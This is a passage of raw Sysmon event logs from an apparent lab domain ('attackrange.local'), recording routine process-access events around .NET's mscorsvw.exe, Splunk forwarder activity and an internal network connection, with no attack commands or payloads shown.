14:57:54.092{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-8F0D-00000000BB01}3000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.076{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-8F0D-00000000BB01}3000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.076{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-8F0D-00000000BB01}3000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.029{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-8E0D-00000000BB01}5360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.014{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-8E0D-00000000BB01}5360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.014{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-8E0D-00000000BB01}5360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000050355Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF2-607E-E906-00000000BB01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050354Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050353Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050352Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050351Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050350Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050349Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050348Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050347Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050346Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050345Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBF2-607E-E906-00000000BB01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050344Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF2-607E-E906-00000000BB01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050343Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.838{85C0FFC9-EBF2-607E-E906-00000000BB01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050342Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.650{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4982C12FF088305BDD61733CA507040,SHA256=AEF6E7C727EF8DAE0E280670C42F821B0ECA411E9A250F7D1E737748EF8B2898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050341Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.166{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0446DBA9C95ACF8C3D4BEC4392AC39B,SHA256=5F51A952A36C1463EF90313DB6CAAC5780178C28F5B0BFD3CE9B856D61E7DEC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050340Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:51.726{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52529-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000076438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-A30D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.936{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-A30D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-A30D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.858{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-A20D-00000000BB01}5664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.842{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-A20D-00000000BB01}5664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 